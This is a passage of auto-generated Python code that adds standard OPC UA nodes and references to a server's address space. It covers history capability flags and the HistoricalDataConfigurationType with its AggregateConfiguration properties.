node.BrowseName = QualifiedName('MaxReturnEventValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("MaxReturnEventValues")
attrs.DataType = ua.NodeId(ua.ObjectIds.UInt32)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11274, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11274, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11196, 0)
node.BrowseName = QualifiedName('InsertDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11196, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11196, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11197, 0)
node.BrowseName = QualifiedName('ReplaceDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReplaceDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11197, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11197, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11198, 0)
node.BrowseName = QualifiedName('UpdateDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdateDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11198, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11198, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11199, 0)
node.BrowseName = QualifiedName('DeleteRawCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteRawCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11199, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11199, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11200, 0)
node.BrowseName = QualifiedName('DeleteAtTimeCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteAtTimeCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11200, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11200, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11281, 0)
node.BrowseName = QualifiedName('InsertEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11281, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11281, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11282, 0)
node.BrowseName = QualifiedName('ReplaceEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReplaceEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11282, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11282, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11283, 0)
node.BrowseName = QualifiedName('UpdateEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdateEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11283, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11283, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11502, 0)
node.BrowseName = QualifiedName('DeleteEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11502, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11502, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11275, 0)
node.BrowseName = QualifiedName('InsertAnnotationCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertAnnotationCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11275, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11275, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11201, 0)
node.BrowseName = QualifiedName('AggregateFunctions', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(61, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("AggregateFunctions")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11201, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(61, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11201, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
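# Standalone property declaration: Annotations (NodeId 11214), a Variable with no
# parent node; its DataType NodeId 891 corresponds to the Annotation structure.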
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11214, 0)
node.BrowseName = QualifiedName('Annotations', 0)
node.NodeClass = NodeClass.Variable
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("Annotations")
attrs.DataType = NumericNodeId(891, 0)
attrs.ValueRank = -2
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11214, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
server.add_references(refs)
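# HistoricalDataConfigurationType (NodeId 2318): ObjectType describing how a
# variable's history is collected. Its AggregateConfiguration and AggregateFunctions
# components and its Stepped, Definition, Min/MaxTimeInterval,
# ExceptionDeviation(Format) and StartOf(Online)Archive properties follow below.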
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2318, 0)
node.BrowseName = QualifiedName('HistoricalDataConfigurationType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(58, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("HistoricalDataConfigurationType")
attrs.IsAbstract = False
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3059, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11876, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2323, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2324, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2325, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2326, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2327, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2328, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11499, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11500, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(2318, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(58, 0)
refs.append(ref)
server.add_references(refs)
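# Mandatory AggregateConfiguration component (NodeId 3059) of
# HistoricalDataConfigurationType, with TreatUncertainAsBad, PercentDataBad,
# PercentDataGood and UseSlopedExtrapolation properties.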
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3059, 0)
node.BrowseName = QualifiedName('AggregateConfiguration', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(11187, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("AggregateConfiguration")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11168, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11169, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11170, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11171, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11187, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(3059, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11168, 0)
node.BrowseName = QualifiedName('TreatUncertainAsBad', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3059, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("TreatUncertainAsBad")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11168, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11168, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11168, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3059, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11169, 0)
node.BrowseName = QualifiedName('PercentDataBad', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3059, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("PercentDataBad")
attrs.DataType = ua.NodeId(ua.ObjectIds.Byte)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11169, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11169, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11169, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3059, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11170, 0)
node.BrowseName = QualifiedName('PercentDataGood', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3059, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("PercentDataGood")
attrs.DataType = ua.NodeId(ua.ObjectIds.Byte)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11170, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11170, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11170, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3059, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11171, 0)
node.BrowseName = QualifiedName('UseSlopedExtrapolation', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3059, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UseSlopedExtrapolation")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11171, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11171, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11171, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3059, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11876, 0)
node.BrowseName = QualifiedName('AggregateFunctions', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(61, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("AggregateFunctions")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11876, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(61, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11876, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11876, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2323, 0)
node.BrowseName = QualifiedName('Stepped', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("Stepped")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2323, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2323, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2323, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2324, 0)
node.BrowseName = QualifiedName('Definition', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("Definition")
attrs.DataType = ua.NodeId(ua.ObjectIds.String)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2324, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2324, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
